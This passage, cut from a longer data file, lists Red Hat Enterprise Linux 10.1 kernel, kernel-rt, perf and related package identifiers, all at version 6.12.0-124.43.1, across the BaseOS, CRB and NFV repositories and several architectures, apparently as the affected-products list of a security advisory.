"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
